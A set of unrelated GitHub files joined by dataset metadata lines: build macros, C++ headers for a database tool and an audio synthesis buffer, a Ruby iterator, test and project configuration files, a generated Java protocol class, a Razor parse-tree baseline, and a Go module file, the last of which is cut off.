AC_DEFUN([gl_PREREQ_GETCWD],
[
AC_REQUIRE([gl_USE_SYSTEM_EXTENSIONS])
AC_REQUIRE([gl_CHECK_TYPE_STRUCT_DIRENT_D_INO])
:
])
| {
"pile_set_name": "Github"
} |
左侧腹股沟 11 15 身体部位
肿物 19 20 症状和体征
| {
"pile_set_name": "Github"
} |
/* BEGIN_COMMON_COPYRIGHT_HEADER
*
* TOra - An Oracle Toolkit for DBA's and developers
*
* Shared/mixed copyright is held throughout files in this product
*
* Portions Copyright (C) 2000-2001 Underscore AB
* Portions Copyright (C) 2003-2005 Quest Software, Inc.
* Portions Copyright (C) 2004-2013 Numerous Other Contributors
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; only version 2 of
* the License is valid for this program.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program as the file COPYING.txt; if not, please see
* http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
*
* As a special exception, you have permission to link this program
* with the Oracle Client libraries and distribute executables, as long
* as you follow the requirements of the GNU GPL in regard to all of the
* software in the executable aside from Oracle client libraries.
*
* All trademarks belong to their respective owners.
*
* END_COMMON_COPYRIGHT_HEADER */
#ifndef TORESULTTABLEVIEWEDIT_H
#define TORESULTTABLEVIEWEDIT_H
#include "core/toqvalue.h"
#include "core/tosql.h"
#include "core/toresult.h"
#include "core/toconnection.h"
#include <QtCore/QObject>
#include <QtCore/QAbstractTableModel>
#include <QTableView>
#include <QtCore/QModelIndex>
#include <QtCore/QList>
#include <QHeaderView>
#include <QMenu>
#include "tools/toresulttableview.h"
class toResultModel;
class toResultModelEdit;
/*! \brief Displays query result as a table and provides functionality to edit it.
Used in Schema browser tool.
*/
class toResultTableViewEdit : public toResultTableView
{
Q_OBJECT;
public:
/**
* Creates a new tableview for editing data
*
* @param readable use readable headers
* @param numberColumn display vertical header
* @param parent qobject parent
* @param name sets objectName property
*/
toResultTableViewEdit(QWidget *parent,
const char *name = 0);
virtual ~toResultTableViewEdit(void);
/**
* Reimplemented to create query and new model.
*/
virtual void query(const QString &sql, toQueryParams const& param);
toResultModelEdit* editModel();
protected slots:
// reimplemented
virtual void slotHandleDoubleClick(const QModelIndex &);
// reimplemented
// Hide all "additional" PriKey columns (staring from 1st column)
virtual void slotApplyColumnRules(void);
private slots:
/**
* Calls Model to add new record.
*/
void addRecord(void);
/**
* Calls Model to add new record.
*/
void duplicateRecord(void);
/**
* Calls Model to delete current record
*/
void deleteRecord(void);
/**
* Clears Changes
*/
void revertChanges(void);
/**
* Handle signal from model when rows are added
*/
void handleNewRows(const QModelIndex &parent, int start, int end);
protected:
/**
* Reimplemented to handle delete key
*/
virtual void keyPressEvent(QKeyEvent * event);
/*
* Helper function - allocate new instance of model
* toResultTableView uses toResultModel
* while
* toResultTableViewEdit uses toResultModelEdit
*/
virtual toResultModel* allocModel(toEventQuery *query);
QString Owner, Table;
QList<QString> PriKeys;
};
#endif
| {
"pile_set_name": "Github"
} |
// Band-limited sound synthesis buffer
// Various changes and hacks for use in Mednafen.
#ifdef __GNUC__
#define blip_inline inline __attribute__((always_inline))
#else
#define blip_inline inline
#endif
#include <limits.h>
#include <inttypes.h>
// Blip_Buffer 0.4.1
#ifndef BLIP_BUFFER_H
#define BLIP_BUFFER_H
// Internal
typedef int32_t blip_long;
typedef uint32_t blip_ulong;
typedef int64_t blip_s64;
typedef uint64_t blip_u64;
// Time unit at source clock rate
typedef blip_long blip_time_t;
// Output samples are 16-bit signed, with a range of -32768 to 32767
typedef short blip_sample_t;
enum { blip_sample_max = 32767 };
class Blip_Buffer {
public:
typedef const char* blargg_err_t;
// Set output sample rate and buffer length in milliseconds (1/1000 sec, defaults
// to 1/4 second), then clear buffer. Returns NULL on success, otherwise if there
// isn't enough memory, returns error without affecting current buffer setup.
blargg_err_t set_sample_rate( long samples_per_sec, int msec_length = 1000 / 4 );
// Set number of source time units per second
void clock_rate( long );
// End current time frame of specified duration and make its samples available
// (along with any still-unread samples) for reading with read_samples(). Begins
// a new time frame at the end of the current frame.
void end_frame( blip_time_t time );
// Read at most 'max_samples' out of buffer into 'dest', removing them from from
// the buffer. Returns number of samples actually read and removed. If stereo is
// true, increments 'dest' one extra time after writing each sample, to allow
// easy interleving of two channels into a stereo output buffer.
long read_samples( blip_sample_t* dest, long max_samples, int stereo = 0 );
// Additional optional features
// Current output sample rate
long sample_rate() const;
// Length of buffer, in milliseconds
int length() const;
// Number of source time units per second
long clock_rate() const;
// Set frequency high-pass filter frequency, where higher values reduce bass more
void bass_freq( int frequency );
// Number of samples delay from synthesis to samples read out
int output_latency() const;
// Remove all available samples and clear buffer to silence. If 'entire_buffer' is
// false, just clears out any samples waiting rather than the entire buffer.
void clear( int entire_buffer = 1 );
// Number of samples available for reading with read_samples()
long samples_avail() const;
// Remove 'count' samples from those waiting to be read
void remove_samples( long count );
// Experimental features
// Count number of clocks needed until 'count' samples will be available.
// If buffer can't even hold 'count' samples, returns number of clocks until
// buffer becomes full.
blip_time_t count_clocks( long count ) const;
// Number of raw samples that can be mixed within frame of specified duration.
long count_samples( blip_time_t duration ) const;
// Mix 'count' samples from 'buf' into buffer.
void mix_samples( blip_sample_t const* buf, long count );
// not documented yet
void set_modified() { modified_ = 1; }
int clear_modified() { int b = modified_; modified_ = 0; return b; }
typedef blip_u64 blip_resampled_time_t;
void remove_silence( long count );
blip_resampled_time_t resampled_duration( int t ) const { return t * factor_; }
blip_resampled_time_t resampled_time( blip_time_t t ) const { return t * factor_ + offset_; }
blip_resampled_time_t clock_rate_factor( long clock_rate ) const;
public:
Blip_Buffer();
~Blip_Buffer();
// Deprecated
typedef blip_resampled_time_t resampled_time_t;
blargg_err_t sample_rate( long r ) { return set_sample_rate( r ); }
blargg_err_t sample_rate( long r, int msec ) { return set_sample_rate( r, msec ); }
private:
// noncopyable
Blip_Buffer( const Blip_Buffer& );
Blip_Buffer& operator = ( const Blip_Buffer& );
public:
typedef blip_time_t buf_t_;
blip_u64 factor_;
blip_resampled_time_t offset_;
buf_t_* buffer_;
blip_long buffer_size_;
blip_long reader_accum_;
int bass_shift_;
private:
long sample_rate_;
long clock_rate_;
int bass_freq_;
int length_;
int modified_;
friend class Blip_Reader;
};
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#define BLIP_BUFFER_ACCURACY 32
#define BLIP_PHASE_BITS 8
// Number of bits in resample ratio fraction. Higher values give a more accurate ratio
// but reduce maximum buffer size.
//#ifndef BLIP_BUFFER_ACCURACY
// #define BLIP_BUFFER_ACCURACY 16
//#endif
// Number bits in phase offset. Fewer than 6 bits (64 phase offsets) results in
// noticeable broadband noise when synthesizing high frequency square waves.
// Affects size of Blip_Synth objects since they store the waveform directly.
//#ifndef BLIP_PHASE_BITS
// #if BLIP_BUFFER_FAST
// #define BLIP_PHASE_BITS 8
// #else
// #define BLIP_PHASE_BITS 6
// #endif
//#endif
// Internal
typedef blip_u64 blip_resampled_time_t;
int const blip_widest_impulse_ = 16;
int const blip_buffer_extra_ = blip_widest_impulse_ + 2;
int const blip_res = 1 << BLIP_PHASE_BITS;
class blip_eq_t;
class Blip_Synth_Fast_ {
public:
Blip_Buffer* buf;
int last_amp;
int delta_factor;
void volume_unit( double );
Blip_Synth_Fast_();
void treble_eq( blip_eq_t const& ) { }
};
class Blip_Synth_ {
public:
Blip_Buffer* buf;
int last_amp;
int delta_factor;
void volume_unit( double );
Blip_Synth_( short* impulses, int width );
void treble_eq( blip_eq_t const& );
private:
double volume_unit_;
short* const impulses;
int const width;
blip_long kernel_unit;
int impulses_size() const { return blip_res / 2 * width + 1; }
void adjust_impulse();
};
// Quality level. Start with blip_good_quality.
const int blip_med_quality = 8;
const int blip_good_quality = 12;
const int blip_high_quality = 16;
// Range specifies the greatest expected change in amplitude. Calculate it
// by finding the difference between the maximum and minimum expected
// amplitudes (max - min).
template<int quality,int range>
class Blip_Synth {
public:
// Set overall volume of waveform
void volume( double v ) { impl.volume_unit( v * (1.0 / (range < 0 ? -range : range)) ); }
// Configure low-pass filter (see blip_buffer.txt)
void treble_eq( blip_eq_t const& eq ) { impl.treble_eq( eq ); }
// Get/set Blip_Buffer used for output
Blip_Buffer* output() const { return impl.buf; }
void output( Blip_Buffer* b ) { impl.buf = b; impl.last_amp = 0; }
// Update amplitude of waveform at given time. Using this requires a separate
// Blip_Synth for each waveform.
void update( blip_time_t time, int amplitude );
// Low-level interface
// Add an amplitude transition of specified delta, optionally into specified buffer
// rather than the one set with output(). Delta can be positive or negative.
// The actual change in amplitude is delta * (volume / range)
void offset( blip_time_t, int delta, Blip_Buffer* ) const;
void offset( blip_time_t t, int delta ) const { offset( t, delta, impl.buf ); }
// Works directly in terms of fractional output samples. Contact author for more info.
void offset_resampled( blip_resampled_time_t, int delta, Blip_Buffer* ) const;
// Same as offset(), except code is inlined for higher performance
void offset_inline( blip_time_t t, int delta, Blip_Buffer* buf ) const {
offset_resampled( t * buf->factor_ + buf->offset_, delta, buf );
}
void offset_inline( blip_time_t t, int delta ) const {
offset_resampled( t * impl.buf->factor_ + impl.buf->offset_, delta, impl.buf );
}
private:
#if BLIP_BUFFER_FAST
Blip_Synth_Fast_ impl;
#else
Blip_Synth_ impl;
typedef short imp_t;
imp_t impulses [blip_res * (quality / 2) + 1];
public:
Blip_Synth() : impl( impulses, quality ) { }
#endif
};
// Low-pass equalization parameters
class blip_eq_t {
public:
// Logarithmic rolloff to treble dB at half sampling rate. Negative values reduce
// treble, small positive values (0 to 5.0) increase treble.
blip_eq_t( double treble_db = 0 );
// See blip_buffer.txt
blip_eq_t( double treble, long rolloff_freq, long sample_rate, long cutoff_freq = 0 );
private:
double treble;
long rolloff_freq;
long sample_rate;
long cutoff_freq;
void generate( float* out, int count ) const;
friend class Blip_Synth_;
};
int const blip_sample_bits = 30;
// Dummy Blip_Buffer to direct sound output to, for easy muting without
// having to stop sound code.
class Silent_Blip_Buffer : public Blip_Buffer {
buf_t_ buf [blip_buffer_extra_ + 1];
public:
// The following cannot be used (an assertion will fail if attempted):
blargg_err_t set_sample_rate( long samples_per_sec, int msec_length );
blip_time_t count_clocks( long count ) const;
void mix_samples( blip_sample_t const* buf, long count );
Silent_Blip_Buffer();
};
#if defined (__GNUC__) || _MSC_VER >= 1100
#define BLIP_RESTRICT __restrict
#else
#define BLIP_RESTRICT
#endif
// Optimized reading from Blip_Buffer, for use in custom sample output
// Begin reading from buffer. Name should be unique to the current block.
#define BLIP_READER_BEGIN( name, blip_buffer ) \
const Blip_Buffer::buf_t_* BLIP_RESTRICT name##_reader_buf = (blip_buffer).buffer_;\
blip_long name##_reader_accum = (blip_buffer).reader_accum_
// Get value to pass to BLIP_READER_NEXT()
#define BLIP_READER_BASS( blip_buffer ) ((blip_buffer).bass_shift_)
// Constant value to use instead of BLIP_READER_BASS(), for slightly more optimal
// code at the cost of having no bass control
int const blip_reader_default_bass = 9;
// Current sample
#define BLIP_READER_READ( name ) (name##_reader_accum >> (blip_sample_bits - 16))
// Current raw sample in full internal resolution
#define BLIP_READER_READ_RAW( name ) (name##_reader_accum)
// Advance to next sample
#define BLIP_READER_NEXT( name, bass ) \
(void) (name##_reader_accum += *name##_reader_buf++ - (name##_reader_accum >> (bass)))
// End reading samples from buffer. The number of samples read must now be removed
// using Blip_Buffer::remove_samples().
#define BLIP_READER_END( name, blip_buffer ) \
(void) ((blip_buffer).reader_accum_ = name##_reader_accum)
// Compatibility with older version
const long blip_unscaled = 65535;
const int blip_low_quality = blip_med_quality;
const int blip_best_quality = blip_high_quality;
// Deprecated; use BLIP_READER macros as follows:
// Blip_Reader r; r.begin( buf ); -> BLIP_READER_BEGIN( r, buf );
// int bass = r.begin( buf ) -> BLIP_READER_BEGIN( r, buf ); int bass = BLIP_READER_BASS( buf );
// r.read() -> BLIP_READER_READ( r )
// r.read_raw() -> BLIP_READER_READ_RAW( r )
// r.next( bass ) -> BLIP_READER_NEXT( r, bass )
// r.next() -> BLIP_READER_NEXT( r, blip_reader_default_bass )
// r.end( buf ) -> BLIP_READER_END( r, buf )
class Blip_Reader {
public:
int begin( Blip_Buffer& );
blip_long read() const { return accum >> (blip_sample_bits - 16); }
blip_long read_raw() const { return accum; }
void next( int bass_shift = 9 ) { accum += *buf++ - (accum >> bass_shift); }
void end( Blip_Buffer& b ) { b.reader_accum_ = accum; }
private:
const Blip_Buffer::buf_t_* buf;
blip_long accum;
};
// End of public interface
#include <assert.h>
template<int quality,int range>
blip_inline void Blip_Synth<quality,range>::offset_resampled( blip_resampled_time_t time,
int delta, Blip_Buffer* blip_buf ) const
{
// Fails if time is beyond end of Blip_Buffer, due to a bug in caller code or the
// need for a longer buffer as set by set_sample_rate().
assert( (blip_long) (time >> BLIP_BUFFER_ACCURACY) < blip_buf->buffer_size_ );
delta *= impl.delta_factor;
blip_long* BLIP_RESTRICT buf = blip_buf->buffer_ + (time >> BLIP_BUFFER_ACCURACY);
int phase = (int) (time >> (BLIP_BUFFER_ACCURACY - BLIP_PHASE_BITS) & (blip_res - 1));
#if BLIP_BUFFER_FAST
blip_long left = buf [0] + delta;
// Kind of crappy, but doing shift after multiply results in overflow.
// Alternate way of delaying multiply by delta_factor results in worse
// sub-sample resolution.
blip_long right = (delta >> BLIP_PHASE_BITS) * phase;
left -= right;
right += buf [1];
buf [0] = left;
buf [1] = right;
#else
int const fwd = (blip_widest_impulse_ - quality) / 2;
int const rev = fwd + quality - 2;
int const mid = quality / 2 - 1;
imp_t const* BLIP_RESTRICT imp = impulses + blip_res - phase;
#if defined (_M_IX86) || defined (_M_IA64) || defined (__i486__) || \
defined (__x86_64__) || defined (__ia64__) || defined (__i386__)
// straight forward implementation resulted in better code on GCC for x86
#define ADD_IMP( out, in ) \
buf [out] += (blip_long) imp [blip_res * (in)] * delta
#define BLIP_FWD( i ) {\
ADD_IMP( fwd + i, i );\
ADD_IMP( fwd + 1 + i, i + 1 );\
}
#define BLIP_REV( r ) {\
ADD_IMP( rev - r, r + 1 );\
ADD_IMP( rev + 1 - r, r );\
}
BLIP_FWD( 0 )
if ( quality > 8 ) BLIP_FWD( 2 )
if ( quality > 12 ) BLIP_FWD( 4 )
{
ADD_IMP( fwd + mid - 1, mid - 1 );
ADD_IMP( fwd + mid , mid );
imp = impulses + phase;
}
if ( quality > 12 ) BLIP_REV( 6 )
if ( quality > 8 ) BLIP_REV( 4 )
BLIP_REV( 2 )
ADD_IMP( rev , 1 );
ADD_IMP( rev + 1, 0 );
#else
// for RISC processors, help compiler by reading ahead of writes
#define BLIP_FWD( i ) {\
blip_long t0 = i0 * delta + buf [fwd + i];\
blip_long t1 = imp [blip_res * (i + 1)] * delta + buf [fwd + 1 + i];\
i0 = imp [blip_res * (i + 2)];\
buf [fwd + i] = t0;\
buf [fwd + 1 + i] = t1;\
}
#define BLIP_REV( r ) {\
blip_long t0 = i0 * delta + buf [rev - r];\
blip_long t1 = imp [blip_res * r] * delta + buf [rev + 1 - r];\
i0 = imp [blip_res * (r - 1)];\
buf [rev - r] = t0;\
buf [rev + 1 - r] = t1;\
}
blip_long i0 = *imp;
BLIP_FWD( 0 )
if ( quality > 8 ) BLIP_FWD( 2 )
if ( quality > 12 ) BLIP_FWD( 4 )
{
blip_long t0 = i0 * delta + buf [fwd + mid - 1];
blip_long t1 = imp [blip_res * mid] * delta + buf [fwd + mid ];
imp = impulses + phase;
i0 = imp [blip_res * mid];
buf [fwd + mid - 1] = t0;
buf [fwd + mid ] = t1;
}
if ( quality > 12 ) BLIP_REV( 6 )
if ( quality > 8 ) BLIP_REV( 4 )
BLIP_REV( 2 )
blip_long t0 = i0 * delta + buf [rev ];
blip_long t1 = *imp * delta + buf [rev + 1];
buf [rev ] = t0;
buf [rev + 1] = t1;
#endif
#endif
}
#undef BLIP_FWD
#undef BLIP_REV
template<int quality,int range>
#if BLIP_BUFFER_FAST
blip_inline
#endif
void Blip_Synth<quality,range>::offset( blip_time_t t, int delta, Blip_Buffer* buf ) const
{
offset_resampled( t * buf->factor_ + buf->offset_, delta, buf );
}
template<int quality,int range>
#if BLIP_BUFFER_FAST
blip_inline
#endif
void Blip_Synth<quality,range>::update( blip_time_t t, int amp )
{
int delta = amp - impl.last_amp;
impl.last_amp = amp;
offset_resampled( t * impl.buf->factor_ + impl.buf->offset_, delta, impl.buf );
}
blip_inline blip_eq_t::blip_eq_t( double t ) :
treble( t ), rolloff_freq( 0 ), sample_rate( 44100 ), cutoff_freq( 0 ) { }
blip_inline blip_eq_t::blip_eq_t( double t, long rf, long sr, long cf ) :
treble( t ), rolloff_freq( rf ), sample_rate( sr ), cutoff_freq( cf ) { }
blip_inline int Blip_Buffer::length() const { return length_; }
blip_inline long Blip_Buffer::samples_avail() const { return (long) (offset_ >> BLIP_BUFFER_ACCURACY); }
blip_inline long Blip_Buffer::sample_rate() const { return sample_rate_; }
blip_inline int Blip_Buffer::output_latency() const { return blip_widest_impulse_ / 2; }
blip_inline long Blip_Buffer::clock_rate() const { return clock_rate_; }
blip_inline void Blip_Buffer::clock_rate( long cps ) { factor_ = clock_rate_factor( clock_rate_ = cps ); }
blip_inline int Blip_Reader::begin( Blip_Buffer& blip_buf )
{
buf = blip_buf.buffer_;
accum = blip_buf.reader_accum_;
return blip_buf.bass_shift_;
}
int const blip_max_length = 0;
int const blip_default_length = 250;
#endif
| {
"pile_set_name": "Github"
} |
require "em/iterator"
module EventMachine
module Synchrony
class Iterator < EM::Iterator
# synchronous iterator which will wait until all the
# jobs are done before returning. Unfortunately this
# means that you loose ability to choose concurrency
# on the fly (see iterator documentation in EM)
def each(foreach=nil, after=nil, &blk)
fiber = Fiber.current
fe = (foreach || blk)
cb = Proc.new do
after.call if after
fiber.resume
end
Fiber.yield super(fe, cb)
end
def map(&block)
fiber = Fiber.current
result = nil
after = Proc.new {|res| result = res; fiber.resume }
super(block, after)
Fiber.yield
result
end
def inject(obj, foreach = nil, after = nil, &block)
if foreach and after
super(obj, foreach, after)
else
fiber = Fiber.current
result = nil
after = Proc.new {|res| result = res; fiber.resume}
super(obj, block, after)
Fiber.yield
result
end
end
end
end
end
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<phpunit backupGlobals="false"
backupStaticAttributes="false"
colors="true">
<testsuites>
<testsuite name="PHP_CodeCoverage">
<directory suffix="Test.php">../Tests/PHP</directory>
</testsuite>
</testsuites>
<logging>
<log type="coverage-text" target="php://stdout"/>
</logging>
<filter>
<whitelist addUncoveredFilesFromWhitelist="true">
<directory suffix=".php">../PHP</directory>
<exclude>
<file>../PHP/CodeCoverage/Autoload.php</file>
</exclude>
</whitelist>
</filter>
</phpunit>
| {
"pile_set_name": "Github"
} |
// Generated source.
// Generator: org.chromium.sdk.internal.wip.tools.protocolgenerator.Generator
// Origin: http://svn.webkit.org/repository/webkit/trunk/Source/WebCore/inspector/Inspector.json@108993
package org.chromium.sdk.internal.wip.protocol.input.dom;
/**
Called when shadow root is pushed into the element.
*/
@org.chromium.sdk.internal.protocolparser.JsonType
public interface ShadowRootPushedEventData {
/**
Host element id.
*/
long/*See org.chromium.sdk.internal.wip.protocol.common.dom.NodeIdTypedef*/ hostId();
/**
Shadow root.
*/
org.chromium.sdk.internal.wip.protocol.input.dom.NodeValue root();
public static final org.chromium.sdk.internal.wip.protocol.input.WipEventType<org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData> TYPE
= new org.chromium.sdk.internal.wip.protocol.input.WipEventType<org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData>("DOM.shadowRootPushed", org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData.class) {
@Override public org.chromium.sdk.internal.wip.protocol.input.dom.ShadowRootPushedEventData parse(org.chromium.sdk.internal.wip.protocol.input.WipGeneratedParserRoot parser, org.json.simple.JSONObject obj) throws org.chromium.sdk.internal.protocolparser.JsonProtocolParseException {
return parser.parseDOMShadowRootPushedEventData(obj);
}
};
}
| {
"pile_set_name": "Github"
} |
RazorDocument - [0..13)::13 - [@foo(LF@**@LF]
MarkupBlock - [0..13)::13
MarkupTextLiteral - [0..0)::0 - [] - Gen<Markup> - SpanEditHandler;Accepts:Any
Marker;[];
CSharpCodeBlock - [0..13)::13
CSharpImplicitExpression - [0..13)::13
CSharpTransition - [0..1)::1 - Gen<None> - SpanEditHandler;Accepts:None
Transition;[@];
CSharpImplicitExpressionBody - [1..13)::12
CSharpCodeBlock - [1..13)::12
CSharpExpressionLiteral - [1..7)::6 - [foo(LF] - Gen<Expr> - ImplicitExpressionEditHandler;Accepts:Any;ImplicitExpression[RTD];K14
Identifier;[foo];
LeftParenthesis;[(];
NewLine;[LF];
RazorComment - [7..11)::4
RazorCommentTransition;[@];
RazorCommentStar;[*];
RazorCommentLiteral;[<Missing>];
RazorCommentStar;[*];
RazorCommentTransition;[@];
CSharpExpressionLiteral - [11..13)::2 - [LF] - Gen<Expr> - ImplicitExpressionEditHandler;Accepts:Any;ImplicitExpression[RTD];K14
NewLine;[LF];
| {
"pile_set_name": "Github"
} |
module github.com/daptin/daptin
go 1.14
// +heroku goVersion go1.15
require (
github.com/GeertJohan/go.rice v1.0.0
github.com/Masterminds/squirrel v1.1.0
github.com/advance512/yaml v0.0.0-20141213031416-e401b2b02685
github.com/alexeyco/simpletable v0.0.0-20180729223640-1fa9009f1080
github.com/anthonynsimon/bild v0.10.0
github.com/araddon/dateparse v0.0.0-20181123171228-21df004e09ca
github.com/artpar/api2go v2.4.4+incompatible
github.com/artpar/api2go-adapter v1.0.1
github.com/artpar/conform v0.0.0-20171227110214-a5409cc587c6
github.com/artpar/go-guerrilla v1.5.2
github.com/artpar/go-httpclient v1.0.0 // indirect
github.com/artpar/go-imap v1.0.3
github.com/artpar/go-imap-idle v1.0.2
github.com/artpar/go-koofrclient v1.0.1 // indirect
github.com/artpar/go-smtp-mta v0.2.0
github.com/artpar/go.uuid v1.2.0
github.com/artpar/parsemail v0.0.0-20190115161936-abc648830b9a
github.com/artpar/rclone v1.50.21
github.com/artpar/resty v1.0.3
github.com/artpar/stats v1.0.2
github.com/artpar/xlsx/v2 v2.0.5
github.com/aviddiviner/gin-limit v0.0.0-20170918012823-43b5f79762c1
github.com/bjarneh/latinx v0.0.0-20120329061922-4dfe9ba2a293
github.com/buraksezer/olric v0.2.0
github.com/corpix/uarand v0.0.0 // indirect
github.com/dgrijalva/jwt-go v3.2.0+incompatible
github.com/disintegration/gift v1.2.1
github.com/dop251/goja v0.0.0-20181125163413-2dd08a5fc665
github.com/emersion/go-message v0.11.1
github.com/emersion/go-msgauth v0.4.0
github.com/etgryphon/stringUp v0.0.0-20121020160746-31534ccd8cac // indirect
github.com/fclairamb/ftpserver v0.0.0-20200221221851-84e5d668e655
github.com/frankban/quicktest v1.7.3 // indirect
github.com/getkin/kin-openapi v0.14.0
github.com/ghodss/yaml v1.0.0
github.com/gin-contrib/gzip v0.0.2
github.com/gin-contrib/static v0.0.0-20181225054800-cf5e10bbd933
github.com/gin-gonic/gin v1.6.3
github.com/go-acme/lego/v3 v3.2.0
github.com/go-gota/gota v0.0.0-20190402185630-1058f871be31
github.com/go-playground/locales v0.13.0
github.com/go-playground/universal-translator v0.17.0
github.com/go-sourcemap/sourcemap v2.1.2+incompatible // indirect
github.com/go-sql-driver/mysql v1.5.0
github.com/gobuffalo/envy v1.9.0 // indirect
github.com/gobuffalo/flect v0.1.5
github.com/gocarina/gocsv v0.0.0-20181213162136-af1d9380204a
github.com/gocraft/health v0.0.0-20170925182251-8675af27fef0
github.com/gohugoio/hugo v0.74.3
github.com/gonum/blas v0.0.0-20181208220705-f22b278b28ac // indirect
github.com/gonum/floats v0.0.0-20181209220543-c233463c7e82 // indirect
github.com/gonum/integrate v0.0.0-20181209220457-a422b5c0fdf2 // indirect
github.com/gonum/internal v0.0.0-20181124074243-f884aa714029 // indirect
github.com/gonum/lapack v0.0.0-20181123203213-e4cdc5a0bff9 // indirect
github.com/gonum/matrix v0.0.0-20181209220409-c518dec07be9 // indirect
github.com/gonum/stat v0.0.0-20181125101827-41a0da705a5b // indirect
github.com/gopherjs/gopherjs v0.0.0-20190915194858-d3ddacdb130f // indirect
github.com/gorilla/feeds v1.1.1
github.com/graphql-go/graphql v0.7.8
github.com/graphql-go/handler v0.2.3
github.com/graphql-go/relay v0.0.0-20171208134043-54350098cfe5
github.com/iancoleman/strcase v0.0.0-20190422225806-e506e3ef7365
github.com/icrowley/fake v0.0.0-20180203215853-4178557ae428
github.com/imroc/req v0.2.4
github.com/jamiealquiza/envy v1.1.0
github.com/jinzhu/copier v0.0.0-20180308034124-7e38e58719c3
github.com/jlaffaye/ftp v0.0.0-20200720194710-13949d38913e
github.com/jmoiron/sqlx v0.0.0-20181024163419-82935fac6c1a
github.com/json-iterator/go v1.1.10
github.com/julienschmidt/httprouter v1.2.0
github.com/kniren/gota v0.10.1 // indirect
github.com/kr/text v0.2.0 // indirect
github.com/labstack/echo v3.3.10+incompatible // indirect
github.com/labstack/gommon v0.2.8 // indirect
github.com/lib/pq v1.1.0
github.com/looplab/fsm v0.0.0-20180515091235-f980bdb68a89
github.com/mattn/go-sqlite3 v1.11.0
github.com/naoina/toml v0.1.1
github.com/pkg/errors v0.9.1
github.com/pquerna/otp v1.2.0
github.com/robfig/cron/v3 v3.0.0
github.com/sadlil/go-trigger v0.0.0-20170328161825-cfc3d83007cd
github.com/siebenmann/smtpd v0.0.0-20170816215504-b93303610bbe // indirect
github.com/simplereach/timeutils v1.2.0 // indirect
github.com/sirupsen/logrus v1.6.0
github.com/smancke/mailck v0.0.0-20180319162224-be54df53c96e
github.com/spf13/cobra v1.0.0
github.com/yangxikun/gin-limit-by-key v0.0.0-20190512072151-520697354d5f
golang.org/x/crypto v0.0.0-20200709230013-948cd5f35899
golang.org/x/net v0.0.0-20200707034311-ab3426394381
golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d
golang.org/x/text v0.3.3
golang.org/x/time v0.0.0-20200416051211-89c76fbcd5d1
gonum.org/v1/gonum v0.6.2 // indirect
gopkg.in/go-playground/validator.v9 v9.30.0
gopkg.in/mgo.v2 v2.0.0-20190816093944-a6b53ec6cb22 // indirect
)
replace github.com/Azure/go-autorest => github.com/Azure/go-autorest v13.0.0+incompatible
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{9800039D-4AAA-43A4-BB78-FEF6F4836927}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>liblz4-dll</RootNamespace>
<OutDir>$(SolutionDir)bin\$(Platform)_$(Configuration)\</OutDir>
<IntDir>$(SolutionDir)bin\obj\$(RootNamespace)_$(Platform)_$(Configuration)\</IntDir>
<ProjectName>liblz4-dll</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<PlatformToolset>v141</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
